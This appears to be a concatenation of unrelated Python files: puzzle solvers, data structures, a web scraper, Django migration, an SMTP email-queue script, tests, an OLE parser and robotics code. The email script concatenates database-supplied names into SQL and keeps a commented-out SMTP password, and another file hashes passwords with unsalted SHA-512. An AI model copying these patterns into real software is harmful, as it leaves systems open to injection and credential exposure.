jack_of_spades == int('J' in cards_in_spades),
ten_of_spades == int('T' in cards_in_spades),
ace_of_hearts == int('A' in cards_in_hearts),
king_of_hearts == int('K' in cards_in_hearts),
queen_of_hearts == int('Q' in cards_in_hearts),
jack_of_hearts == int('J' in cards_in_hearts),
ten_of_hearts == int('T' in cards_in_hearts),
ace_of_diamonds == int('A' in cards_in_diamonds),
king_of_diamonds == int('K' in cards_in_diamonds),
queen_of_diamonds == int('Q' in cards_in_diamonds),
jack_of_diamonds == int('J' in cards_in_diamonds),
ten_of_diamonds == int('T' in cards_in_diamonds),
ace_of_clubs == int('A' in cards_in_clubs),
king_of_clubs == int('K' in cards_in_clubs),
queen_of_clubs == int('Q' in cards_in_clubs),
jack_of_clubs == int('J' in cards_in_clubs),
ten_of_clubs == int('T' in cards_in_clubs),
)
positions = enum.Enum(
"RHO",
"Partner",
"LHO",
"Me",
)
def is_certain(solver, expr):
solver.push()
solver.add(z3.Not(expr))
result = solver.check() == z3.unsat
solver.pop()
return result
def is_possible(solver, expr):
solver.push()
solver.add(expr)
result = solver.check() == z3.sat
solver.pop()
return result
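# Minimal usage sketch: load the axioms into a solver and query it with the
# helpers above.
if __name__ == '__main__':
    solver = z3.Solver()
    solver.add(*axioms)
    solver.add(balanced)
    # A balanced hand has no voids, by the definition of `balanced` above.
    assert is_certain(solver, voids == 0)
    # 20 high-card points is still achievable on a balanced hand.
    assert is_possible(solver, high_card_points == 20)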
| python |
# An XOR linked list is a more memory efficient doubly linked list.
# Instead of each node holding next and prev fields, it holds a field named both,
# which is an XOR of the next node and the previous node.
# Implement an XOR linked list; it has an add(element) which adds the
# element to the end, and a get(index) which returns the node at index.
# If using a language that has no pointers (such as Python),
# you can assume you have access to get_pointer and
# dereference_pointer functions that converts between nodes and memory addresses
# Note: not sure how to test the code since Python doesn't use
# pointers the same way as other languages.
class Node():
    def __init__(self, value=None, xor=0):
        self.value = value
        self.xor = xor  # XOR of the addresses of the previous and next nodes
def get_pointer(node):
    # Assumed to be provided by the environment (see note above).
    pass
def dereference_pointer(address):
    # Assumed to be provided by the environment (see note above).
    pass
class XORlist():
    def __init__(self):
        self.head = None
        self.tail = None
    def add(self, element):
        new = Node(element)
        if self.head is None:
            self.head = self.tail = new
        else:
            # The new node links back to the old tail; the old tail's xor
            # gains a forward link to the new node.
            new.xor = get_pointer(self.tail)
            self.tail.xor ^= get_pointer(new)
            self.tail = new
    def get(self, index):
        if index < 0:
            return None
        node = self.head
        prev_address = 0
        for _ in range(index):
            if node is None:
                return None
            next_address = node.xor ^ prev_address
            prev_address = get_pointer(node)
            node = dereference_pointer(next_address) if next_address else None
        return node
from app import const
BASE_ID = const.AIRTABLE_MAP_BY_GEOGRAPHIC_AREA_BASE_ID
AREA_CONTACT_TABLE_NAME = "Area Contact"
AREA_TARGET_COMMUNITY_TABLE_NAME = "Area Target Community"
class AirtableGeographicAreaTypes:
AREA_TYPE_CITY = "City"
AREA_TYPE_POLYGON = "Polygon"
AREA_TYPE_REGION = "Region"
AREA_TYPE_STATE = "State"
AREA_TYPE_COUNTRY = "Country"
AREA_TYPE_DEFAULT_US = "Default (US)"
AREA_TYPE_DEFAULT_INTERNATIONAL = "Default (International)"
| python |
from csv import DictReader
from scrapy import Item
from pyproj import Proj, transform
from jedeschule.spiders.nordrhein_westfalen_helper import NordRheinWestfalenHelper
from jedeschule.spiders.school_spider import SchoolSpider
from jedeschule.items import School
# for an overview of the data provided by the State of
# Nordrhein-Westfalen, check out the overview page here:
# https://www.schulministerium.nrw.de/ministerium/open-government/offene-daten
class NordrheinWestfalenSpider(SchoolSpider):
name = 'nordrhein-westfalen'
start_urls = [
'https://www.schulministerium.nrw.de/BiPo/OpenData/Schuldaten/schuldaten.csv',
]
def parse(self, response):
body = response.body.decode('utf-8').splitlines()
# skip the first line which contains information about the separator
reader = DictReader(body[1:], delimiter=';')
for line in reader:
yield line
@staticmethod
def normalize(item: Item) -> School:
name = " ".join([item.get("Schulbezeichnung_1", ""),
item.get("Schulbezeichnung_2", ""),
item.get("Schulbezeichnung_3", "")]).strip()
helper = NordRheinWestfalenHelper()
right, high = item.get('UTMRechtswert'), item.get('UTMHochwert')
this_projection = Proj(item.get('EPSG'))
target_projection = Proj('epsg:4326')
lon, lat = transform(this_projection, target_projection, right, high)
return School(name=name,
id='NW-{}'.format(item.get('Schulnummer')),
address=item.get('Strasse'),
zip=item.get("PLZ"),
city=item.get('Ort'),
website=item.get('Homepage'),
email=item.get('E-Mail'),
legal_status=helper.resolve('rechtsform', item.get('Rechtsform')),
school_type=helper.resolve('schulform', item.get('Schulform')),
provider=helper.resolve('provider', item.get('Traegernummer')),
fax=f"{item.get('Faxvorwahl')}{item.get('Fax')}",
phone=f"{item.get('Telefonvorwahl')}{item.get('Telefon')}",
latitude=lat,
longitude=lon,
)
| python |
# Generated by Django 3.2 on 2022-02-12 21:34
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('reservations', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='reservation',
name='needed_capacity',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reservations.reservationcapacity'),
),
migrations.AlterField(
model_name='reservation',
name='status',
field=models.CharField(choices=[('S', 'Scheduled'), ('A', 'Active'), ('D', 'Done')], default='S', max_length=1),
),
]
| python |
import hashlib
import os
import errno
def hashpasswd(passwd):
return hashlib.sha512(passwd.encode('utf-8')).hexdigest()
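# Usage sketch: hashpasswd("secret") returns the 128-character hex SHA-512 digest.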
def create_path(path):
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
class EvalBuilder:
_expressions = None
def __init__(self):
self._expressions = []
def append(self, expression):
self._expressions.append(expression)
def __str__(self):
if len(self._expressions) == 0:
return "True"
        return "and_(" + ",".join(["True"] + self._expressions) + ")"
def getEvalStr(self):
return self.__str__()
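# Quick demonstration (a sketch; `and_` would come from SQLAlchemy when the
# built string is eventually eval()'d -- the expressions here are hypothetical):
if __name__ == '__main__':
    builder = EvalBuilder()
    builder.append("User.age > 18")
    builder.append("User.active == True")
    print(builder.getEvalStr())  # -> and_(True,User.age > 18,User.active == True)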
| python |
#!/usr/bin/env python
# created by Reyad
import smtplib
import json
# import datetime
# import mysql.connector
import pymysql
# import MySQLdb
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from datetime import datetime
# import datetime
from email.mime.application import MIMEApplication
from dotenv import load_dotenv
import os
from pathlib import Path # python3 only
load_dotenv()
hostname = os.getenv("DB_HOST")
username = os.getenv("DB_USERNAME")
password = os.getenv("DB_PASSWORD")
database = os.getenv("DB_DATABASE")
# myConnection = mysql.connector.connect( host=hostname, user=username, passwd=password, db=database )
myConnection = pymysql.connect(host=hostname, user=username, passwd=password, db=database)
def email_queue(conn):
cur = conn.cursor()
maximum_total_mail = 300
# start email configuration setup
sql = "SELECT id,from_email,server_details, sent_total_mail, last_updated_date " \
"FROM email_configuration WHERE is_active=1 AND sent_total_mail >=" + str(maximum_total_mail) + ""
cur.execute(sql)
for id, from_email, server_details, sent_total_mail, last_updated_date in cur.fetchall():
application_updated_date = last_updated_date
current_date = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
datetimeFormat = '%Y-%m-%d %H:%M:%S'
date1 = str(application_updated_date)
diff = datetime.strptime(current_date, datetimeFormat) \
- datetime.strptime(date1, datetimeFormat)
        # after 24 hours, archive the day's totals and reset the counter
if diff.days >= 1:
query3 = "INSERT INTO email_configuration_history(from_email,sent_total_mail,server_details," \
"created_at,updated_at) VALUES(%s,%s,%s,%s,%s)"
args = (from_email, sent_total_mail, server_details, current_date, current_date)
cur.execute(query3, args)
query4 = "UPDATE email_configuration SET sent_total_mail = %s, updated_at = %s, last_updated_date = %s" \
" where id= %s"
data2 = (0, str(current_date), str(current_date), id)
cur.execute(query4, data2)
conn.commit()
# end of email configuration setup
config = "SELECT server_details,sent_total_mail, id " \
"FROM email_configuration WHERE is_active=1 AND sent_total_mail <="+str(maximum_total_mail)+" "
cur.execute(config)
row = cur.fetchone()
if row:
config_data = json.loads(row[0])
MAIL_USERNAME = config_data["MAIL_USERNAME"]
MAIL_PASSWORD = config_data["MAIL_PASSWORD"]
MAIL_HOST = config_data["MAIL_HOST"]
MAIL_PORT = config_data["MAIL_PORT"]
else:
        print("Today's email quota is full. Please check the email_configuration table!")
exit()
# # Default configuration
# MAIL_USERNAME = '[email protected]'
# MAIL_PASSWORD = 'mKFxxgf3'
# MAIL_HOST = 'smtp.bidaquickserv.org'
# # MAIL_HOST = 'smtp.gmail.com'
# MAIL_PORT = 587 #tls
# #MAIL_PORT = 465 #ssl
# for details in cur.fetchall()
query = "SELECT id,email_to,email_cc,email_content,no_of_try,attachment,email_subject,attachment_certificate_name,"\
"app_id, service_id FROM email_queue WHERE email_status=0 AND email_to!='' ORDER BY id DESC LIMIT 5"
result = cur.execute(query)
count = 0
is_active = 1
smtp_response = ''
attachments = ''
if result > 0:
for id, email_to, email_cc, email_content, no_of_try, attachment, email_subject, attachment_certificate_name, app_id, service_id in cur.fetchall():
print("from: " + MAIL_USERNAME)
print('to', email_to)
# attachment certificate link
if attachment_certificate_name:
cer_exp = attachment_certificate_name.split('.')
if cer_exp[0] is not None: # cer_exp[0] = TABLE NAME, cer_exp[1] = FILED NAME
sql2 = "SELECT "+str(cer_exp[1])+" FROM "+str(cer_exp[0])+" where id= " + str(app_id) + " AND "+str(cer_exp[1])+"!='' "
result2 = cur.execute(sql2)
if result2 == 0:
continue
else:
certificate_link = cur.fetchone()
email_content = email_content.replace('{attachment}', certificate_link[0])
html = email_content
msg = MIMEMultipart('alternative')
msg["Subject"] = email_subject
msg["From"] = MAIL_USERNAME
msg["To"] = email_to
msg["Cc"] = email_cc
if msg["Cc"] is not None:
cc = msg["Cc"].split(",")
else:
cc = ['']
            if msg["To"]:
                to = msg["To"].split(",")
            else:
                to = ['']
part2 = MIMEText(html, 'html')
msg.attach(part2)
# Attach pdf file to the email
if attachment:
attachment_file = MIMEApplication(open(attachment, "rb").read())
attachment_file.add_header('Content-Disposition', 'attachment', filename=attachment)
msg.attach(attachment_file)
try:
if MAIL_HOST == 'smtp.gmail.com':
server = smtplib.SMTP_SSL(host=MAIL_HOST, port=MAIL_PORT)
else:
server = smtplib.SMTP(MAIL_HOST, MAIL_PORT) # smtp tls premium server [email protected]
server.login(MAIL_USERNAME, MAIL_PASSWORD)
                server.sendmail(str(msg["From"]), to + cc, msg.as_string())
server.quit()
# server.ehlo()
status = 1
mail_messages = "Email has been sent on " + datetime.now().strftime('%Y-%m-%d %H:%M:%S')
count += 1
no_of_try += 1
except smtplib.SMTPException as e:
no_of_try = no_of_try + 1
if no_of_try > 10:
status = -9
else:
status = 0
mail_messages = 'Something went wrong...' + str(e)
smtp_response = str(e)
is_active = -9 # forcefully inactive
query1 = "UPDATE email_queue SET email_status = %s, no_of_try = %s where id= %s"
data = (status, no_of_try, id)
cur.execute(query1, data)
query2 = "UPDATE email_configuration SET is_active=%s,sent_total_mail =%s,updated_at =%s," \
"smtp_response=%s where id=%s "
data5 = (is_active, str(row[1]+count), datetime.now().strftime("%Y-%m-%d %H:%M:%S"), smtp_response, row[2])
cur.execute(query2, data5)
print(row[1]+count)
conn.commit()
print(mail_messages)
if count == 0:
print("No Email in queue to send! " + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
print("Using PyMySQL…")
email_queue(myConnection)
myConnection.close()
| python |
from is_wire.core import Channel, Message, Subscription
from google.protobuf.struct_pb2 import Struct
import socket
channel = Channel("amqp://guest:[email protected]:30000")
subscription = Subscription(channel)
# Prepare request
struct = Struct()
struct.fields["value"].number_value = 1.0
request = Message(content=struct, reply_to=subscription)
# Make request
channel.publish(request, topic="Tester.Increment")
# Wait for reply with 1.0 seconds timeout
try:
reply = channel.consume(timeout=1.0)
struct = reply.unpack(Struct)
print('RPC Status:', reply.status, '\nReply:', struct)
except socket.timeout:
print('No reply :(')
| python |
import logging
from omega import __version__
from tests.interfaces.test_web_interfaces import TestWebInterfaces
logger = logging.getLogger(__name__)
class TestSys(TestWebInterfaces):
async def test_sever_version(self):
ver = await self.server_get("sys", "version", is_pickled=False)
self.assertEqual(__version__, ver)
| python |
from montague.ast import (
And,
Call,
ComplexType,
Exists,
ForAll,
IfAndOnlyIf,
IfThen,
Iota,
Lambda,
Not,
Or,
TYPE_ENTITY,
TYPE_EVENT,
TYPE_TRUTH_VALUE,
TYPE_WORLD,
Var,
)
def test_variable_to_str():
assert str(Var("a")) == "a"
def test_and_to_str():
assert str(And(Var("a"), Var("b"))) == "a & b"
def test_or_to_str():
assert str(Or(Var("a"), Var("b"))) == "a | b"
def test_if_then_to_str():
assert str(IfThen(Var("a"), Var("b"))) == "a -> b"
def test_if_and_only_if_to_str():
assert str(IfAndOnlyIf(Var("a"), Var("b"))) == "a <-> b"
def test_lambda_to_str():
tree = Lambda("x", And(Var("a"), Var("x")))
assert str(tree) == "λx.a & x"
assert tree.ascii_str() == "Lx.a & x"
# This formula is semantically invalid but that doesn't matter.
assert str(And(Lambda("x", Var("x")), Lambda("y", Var("y")))) == "[λx.x] & [λy.y]"
def test_call_to_str():
assert (
str(Call(Call(Var("P"), And(Var("a"), Var("b"))), Lambda("x", Var("x"))))
== "P(a & b, λx.x)"
)
assert str(Call(Var("P"), Var("x"))) == "P(x)"
def test_for_all_to_str():
tree = ForAll("x", Call(Var("P"), Var("x")))
assert str(tree) == "∀ x.P(x)"
assert tree.ascii_str() == "Ax.P(x)"
def test_exists_to_str():
tree = Exists("x", Call(Var("P"), Var("x")))
assert str(tree) == "∃ x.P(x)"
assert tree.ascii_str() == "Ex.P(x)"
def test_not_to_str():
assert str(Not(Var("x"))) == "~x"
assert str(Not(Or(Var("x"), Var("y")))) == "~[x | y]"
def test_binary_operators_to_str():
assert str(And(Or(Var("a"), Var("b")), Var("c"))) == "[a | b] & c"
assert str(Or(And(Var("a"), Var("b")), Var("c"))) == "a & b | c"
assert str(Or(Var("a"), Or(Var("b"), Var("c")))) == "a | b | c"
assert str(And(Var("a"), And(Var("b"), Var("c")))) == "a & b & c"
def test_nested_exists_and_for_all_to_str():
assert str(And(ForAll("x", Var("x")), Exists("x", Var("x")))) == "[∀ x.x] & [∃ x.x]"
def test_iota_to_str():
tree = Iota("x", Var("x"))
assert str(tree) == "ιx.x"
assert tree.ascii_str() == "ix.x"
def test_entity_to_str():
assert str(TYPE_ENTITY) == "e"
def test_event_to_str():
assert str(TYPE_EVENT) == "v"
def test_truth_value_to_str():
assert str(TYPE_TRUTH_VALUE) == "t"
def test_world_to_str():
assert str(TYPE_WORLD) == "s"
def test_recursive_type_to_str():
assert str(ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE)) == "<e, t>"
def test_deeply_recursive_type_to_str():
assert (
str(
ComplexType(
TYPE_EVENT,
ComplexType(
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
),
)
)
== "<v, <<e, t>, <e, t>>>"
)
def test_recursive_type_to_concise_str():
typ = ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE)
assert typ.concise_str() == "et"
def test_deeply_recursive_type_to_concise_str():
typ = ComplexType(
TYPE_EVENT,
ComplexType(
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
ComplexType(TYPE_ENTITY, TYPE_TRUTH_VALUE),
),
)
assert typ.concise_str() == "<v, <et, et>>"
def test_simple_replace_variable():
assert Var("x").replace_variable("x", Var("y")) == Var("y")
def test_replace_variable_in_and_or():
tree = And(Or(Var("x"), Var("y")), Var("z"))
assert tree.replace_variable("x", Var("x'")) == And(
Or(Var("x'"), Var("y")), Var("z")
)
def test_replace_predicate():
tree = Call(Var("P"), Var("x"))
assert tree.replace_variable("P", Var("Good")) == Call(Var("Good"), Var("x"))
def test_replace_variable_in_quantifiers():
tree = ForAll(
"x",
Or(And(ForAll("b", Var("b")), Exists("b", Var("b"))), Exists("y", Var("b"))),
)
assert tree.replace_variable("b", Var("bbb")) == ForAll(
"x",
Or(And(ForAll("b", Var("b")), Exists("b", Var("b"))), Exists("y", Var("bbb"))),
)
def test_recursive_replace_variable():
# BFP(x, Lx.x, x & y)
tree = Call(
Call(
Call(Var("BFP"), Var("x")),
Lambda("x", Var("x")), # This should not be replaced.
),
And(Var("x"), Var("y")),
)
assert tree.replace_variable("x", Var("j")) == Call(
Call(Call(Var("BFP"), Var("j")), Lambda("x", Var("x"))), And(Var("j"), Var("y"))
)
def test_replace_variable_in_iota():
tree = Iota("x", And(Var("x"), Var("y")))
assert tree.replace_variable("x", Var("a")) == tree
assert tree.replace_variable("y", Var("b")) == Iota("x", And(Var("x"), Var("b")))
| python |
from recommendation.api.types.related_articles import candidate_finder
from recommendation.utils import configuration
import recommendation
EXPECTED = [('Q22686', 1.0), ('Q3752663', 0.8853468379287844), ('Q2462124', 0.861691557168689),
('Q432473', 0.8481581254555062), ('Q242351', 0.8379904779822078), ('Q868772', 0.8087311692249578),
('Q21070387', 0.7956811552934058), ('Q239411', 0.7829732882093489), ('Q736223', 0.7760532537216831),
('Q3731533', 0.7474319215265643), ('Q699872', 0.6474165168034756), ('Q2597050', 0.6352709659245916),
('Q12071552', 0.6273134513051442), ('Q6294', 0.6132842610738145), ('Q13628723', 0.5921917468920406),
('Q359442', 0.5868018793427279), ('Q29468', 0.5696888764253161), ('Q76', 0.5616138355609682),
('Q2036942', 0.5538574999463601), ('Q324546', 0.5466022935973467), ('Q17092708', 0.5438881700622109),
('Q69319', 0.5400609632856112), ('Q846330', 0.5337995502586717), ('Q44430', 0.5300078863669737),
('Q816459', 0.5156321533144876), ('Q4496', 0.515222705930191), ('Q29552', 0.5072461049596773)]
def test_embedding():
candidate_finder.initialize_embedding(optimize=False)
results = candidate_finder.get_embedding().most_similar('Q22686')
for expected, actual in zip(EXPECTED, results):
assert expected[0] == actual[0]
assert isclose(expected[1], actual[1])
def test_configuration():
assert recommendation.__name__ == configuration.get_config_value('related_articles', 'embedding_package')
# math.isclose was added in 3.5
# https://www.python.org/dev/peps/pep-0485/#proposed-implementation
def isclose(a, b, rel_tol=1e-09, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
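if __name__ == '__main__':
    # Sanity checks for the isclose backport (a sketch, not part of the test suite):
    assert isclose(0.1 + 0.2, 0.3)
    assert not isclose(1.0, 1.1)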
| python |
"""
Objects
Defining objects imitating the behavior of Python's built-in objects but linked to the database.
"""
from yuno.objects.dict import YunoDict
from yuno.objects.list import YunoList
| python |
import ptypes
from ptypes import *
## string primitives
class LengthPrefixedAnsiString(pstruct.type):
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.int()), 'String'),
]
def str(self):
return self['String'].li.str()
class LengthPrefixedUnicodeString(pstruct.type):
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.wstring, length=s['Length'].li.int()), 'String'),
]
def str(self):
return self['String'].li.str()
## PresentationObject Format
class PresentationObjectHeader(pstruct.type):
def __ClassName(self):
fmt = self['FormatID'].li.int()
if fmt == 5:
return LengthPrefixedAnsiString
return pstr.string
_fields_ = [
(pint.uint32_t, 'OLEVersion'),
(pint.uint32_t, 'FormatID'),
(__ClassName, 'ClassName'),
]
class PresentationObjectType(ptype.definition):
cache = {}
@PresentationObjectType.define(type='METAFILEPICT')
@PresentationObjectType.define(type='BITMAP')
@PresentationObjectType.define(type='DIB')
class StandardPresentationObject(pstruct.type):
class BitmapPresentationSize(pint.uint32_t): pass
class MetaFilePresentationSize(pint.uint32_t): pass
def __SizeType(self):
if self.type in ('BITMAP', 'DIB'):
return self.BitmapPresentationSize
if self.type in ('METAFILEPICT',):
return self.MetaFilePresentationSize
return pint.uint32_t
_fields_ = [
(__SizeType, 'Width'),
(__SizeType, 'Height'),
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
class ClipboardFormatHeader(pstruct.type): pass
@PresentationObjectType.define
class GenericPresentationObject(pstruct.type):
type = None
def __ClipboardObject(self):
fmt = self['Header'].li['ClipboardFormat'].int()
return ClipboardFormatType.withdefault(fmt, type=fmt)
_fields_ = [
(ClipboardFormatHeader, 'Header'),
(__ClipboardObject, 'Object'),
]
PresentationObjectType.default = GenericPresentationObject
## Clipboard Format (must not be set to 0)
ClipboardFormatHeader._fields_ = [
(pint.uint32_t, 'ClipboardFormat')
]
class ClipboardFormatType(ptype.definition):
cache = {}
@ClipboardFormatType.define
class StandardClipboardFormatPresentationObject(pstruct.type):
type = None
_fields_ = [
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
ClipboardFormatType.default = StandardClipboardFormatPresentationObject
@ClipboardFormatType.define
class RegisteredClipboardFormatPresentationObject(pstruct.type):
type = 0x00000000
_fields_ = [
(pint.uint32_t, 'StringFormatDataSize'),
(lambda s: dyn.block(s['StringFormatDataSize'].li.int()), 'StringFormatData'),
(pint.uint32_t, 'PresentationDataSize'),
(lambda s: dyn.block(s['PresentationDataSize'].li.int()), 'PresentationData'),
]
## Object
class ObjectHeader(pstruct.type):
def __ClassName(self):
fmt = self['FormatID'].li.int()
if fmt == 5:
return LengthPrefixedAnsiString
return ptype.type
_fields_ = [
(pint.uint32_t, 'OLEVersion'),
(pint.uint32_t, 'FormatID'),
(__ClassName, 'ClassName'),
(LengthPrefixedAnsiString, 'TopicName'),
(LengthPrefixedAnsiString, 'ItemName'),
]
class ObjectType(ptype.definition):
cache = {}
@ObjectType.define
class EmbeddedObject(pstruct.type):
type = 0x00000002
_fields_ = [
(pint.uint32_t, 'NativeDataSize'),
(lambda s: dyn.block(s['NativeDataSize'].li.int()), 'NativeData'),
]
@ObjectType.define
class LinkedObject(pstruct.type):
type = 0x00000001
_fields_ = [
(LengthPrefixedAnsiString, 'NetworkName'),
(pint.uint32_t, 'Reserved'),
(pint.uint32_t, 'LinkUpdateOption'),
]
### OLE 1.0 Format Structures
class PresentationObject(pstruct.type):
def __PresentationObject(self):
fmt = self['Header'].li['FormatID'].int()
if fmt != 0:
clsname = self['Header']['ClassName'].str()
return PresentationObjectType.withdefault(clsname, type=clsname)
return ptype.type
_fields_ = [
(PresentationObjectHeader, 'Header'),
(__PresentationObject, 'Object'),
]
# Ole v1.0
class Object(pstruct.type):
def __Object(self):
fmtid = self['Header'].li['FormatID'].int()
return ObjectType.withdefault(fmtid, type=fmtid)
_fields_ = [
(ObjectHeader, 'Header'),
(__Object, 'Object'),
(PresentationObject, 'Presentation'),
]
if __name__ == '__main__':
pass
| python |
##############################################################################
# Copyright (c) 2016 ZTE Corporation
# [email protected]
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import inspect
import json
import tornado.template
import tornado.web
from opnfv_testapi.tornado_swagger import settings
def json_dumps(obj, pretty=False):
return json.dumps(obj,
sort_keys=True,
indent=4,
separators=(',', ': ')) if pretty else json.dumps(obj)
class SwaggerUIHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.static_path = kwargs.get('static_path')
self.base_url = kwargs.get('base_url')
def get_template_path(self):
return self.static_path
def get(self):
resource_url = self.reverse_url(settings.RESOURCE_LISTING_NAME)
discovery_url = self.base_url + resource_url
self.render('swagger/index.html', discovery_url=discovery_url)
class SwaggerResourcesHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.api_version = kwargs.get('api_version')
self.swagger_version = kwargs.get('swagger_version')
self.base_url = kwargs.get('base_url')
self.exclude_namespaces = kwargs.get('exclude_namespaces')
def get(self):
self.set_header('content-type', 'application/json')
resources = {
'apiVersion': self.api_version,
'swaggerVersion': self.swagger_version,
'basePath': self.base_url,
'apis': [{
'path': self.reverse_url(settings.API_DECLARATION_NAME),
'description': 'Restful APIs Specification'
}]
}
self.finish(json_dumps(resources, self.get_arguments('pretty')))
class SwaggerApiHandler(tornado.web.RequestHandler):
def initialize(self, **kwargs):
self.api_version = kwargs.get('api_version')
self.swagger_version = kwargs.get('swagger_version')
self.base_url = kwargs.get('base_url')
def get(self):
self.set_header('content-type', 'application/json')
apis = self.find_api(self.application.handlers)
if apis is None:
raise tornado.web.HTTPError(404)
specs = {
'apiVersion': self.api_version,
'swaggerVersion': self.swagger_version,
'basePath': self.base_url,
'resourcePath': '/',
'produces': ["application/json"],
'apis': [self.__get_api_spec__(path, spec, operations)
for path, spec, operations in apis],
'models': self.__get_models_spec(settings.models)
}
self.finish(json_dumps(specs, self.get_arguments('pretty')))
def __get_models_spec(self, models):
models_spec = {}
for model in models:
models_spec.setdefault(model.id, self.__get_model_spec(model))
return models_spec
@staticmethod
def __get_model_spec(model):
return {
'description': model.summary,
'id': model.id,
'notes': model.notes,
'properties': model.properties,
'required': model.required
}
@staticmethod
def __get_api_spec__(path, spec, operations):
return {
'path': path,
'description': spec.handler_class.__doc__,
'operations': [{
'httpMethod': api.func.__name__.upper(),
'nickname': api.nickname,
'parameters': api.params.values(),
'summary': api.summary,
'notes': api.notes,
'responseClass': api.responseClass,
'responseMessages': api.responseMessages,
} for api in operations]
}
@staticmethod
def find_api(host_handlers):
def get_path(url, args):
return url % tuple(['{%s}' % arg for arg in args])
def get_operations(cls):
return [member.rest_api
for (_, member) in inspect.getmembers(cls)
if hasattr(member, 'rest_api')]
for host, handlers in host_handlers:
for spec in handlers:
for (_, mbr) in inspect.getmembers(spec.handler_class):
if inspect.ismethod(mbr) and hasattr(mbr, 'rest_api'):
path = get_path(spec._path, mbr.rest_api.func_args)
operations = get_operations(spec.handler_class)
yield path, spec, operations
break
| python |
import sys
def raise_from(my_exception, other_exception):
raise my_exception, None, sys.exc_info()[2] # noqa: W602, E999
| python |
from flask import Flask
app = Flask(__name__)
@app.route('/hello/<name>')
def hello(name: str) -> str:
return f"Hello {name}!"
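if __name__ == '__main__':
    # Development-server entry point (a sketch); use a WSGI server in production.
    app.run(debug=True)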
| python |
#!/usr/bin/env python
import roslib; roslib.load_manifest('teleop_twist_keyboard')
import rospy
from geometry_msgs.msg import Twist
import sys, select, termios, tty, rospy
import curses
msg = """
Reading from the keyboard and Publishing to Twist!
---------------------------
Moving options:
---------------------------
w -- up (+z)
s -- down (-z)
a -- counter clockwise yaw
d -- clockwise yaw
up arrow -- forward (+x)
down arrow -- backward (-x)
<- -- forward (+y)
-> -- backward (-y)
CTRL-C to quit
"""
print msg
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.2)
if rlist:
key = sys.stdin.read(1)
### if using arrow keys, need to retrieve 3 keys in buffer
if ord(key) == 27:
key = sys.stdin.read(1)
if ord(key) == 91:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('teleop_twist_keyboard')
pub = rospy.Publisher('~cmd_vel', Twist, queue_size = 1)
v = rospy.get_param("~v", 2.0)
w = rospy.get_param("~w", 1.0)
    rate = rospy.Rate(20) # 20hz
while not rospy.is_shutdown():
vx = 0
vy = 0
vz = 0
wy = 0
key = getKey()
if key == 'w':
vx = v
elif key == 's':
vx = -v
elif key == 'a':
vy = v
elif key == 'd':
vy = -v
elif key=='A':
vz = v
elif key=='B':
vz = -v
elif key=='C':
wy = -w
elif key=='D':
wy = w
if (key == '\x03'):
break
twist = Twist()
twist.linear.x = vx; twist.linear.y = vy; twist.linear.z = vz;
twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = wy
pub.publish(twist)
rate.sleep()
| python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
from Box2D.b2 import contactListener
from parameters import *
from creatures import Animatronic
class nnContactListener(contactListener):
def __init__(self):
contactListener.__init__(self)
self.sensors = dict()
def BeginContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 1.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = True
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 1.0
elif isinstance(f2.userData, Animatronic):
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = True
def EndContact(self, contact):
f1, f2 = contact.fixtureA, contact.fixtureB
if "ground" in (f1.userData, f2.userData):
if isinstance(f1.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f1.userData[0]][f1.userData[1]] = 0.0
elif isinstance(f1.userData, Animatronic):
# Detect body touching ground
if f1 == f1.userData.body.fixtures[0]:
self.sensors[f1.userData.id][-1] = False
if isinstance(f2.userData, tuple):
# This fixture is an Animatronic sensor
self.sensors[f2.userData[0]][f2.userData[1]] = 0.0
            elif isinstance(f2.userData, Animatronic) and f2.userData.body.fixtures:  # guard: the body may already have been destroyed
# Detect body touching ground
if f2 == f2.userData.body.fixtures[0]:
self.sensors[f2.userData.id][-1] = False
def registerSensors(self, id, n):
"""
Args:
id: Animatronic unique identifier
n: number of sensor to register
"""
self.sensors[id] = [0.0]*(n+1) # Last slot for body touching ground
def unregisterSensors(self, id):
del self.sensors[id]
def breed(creatures):
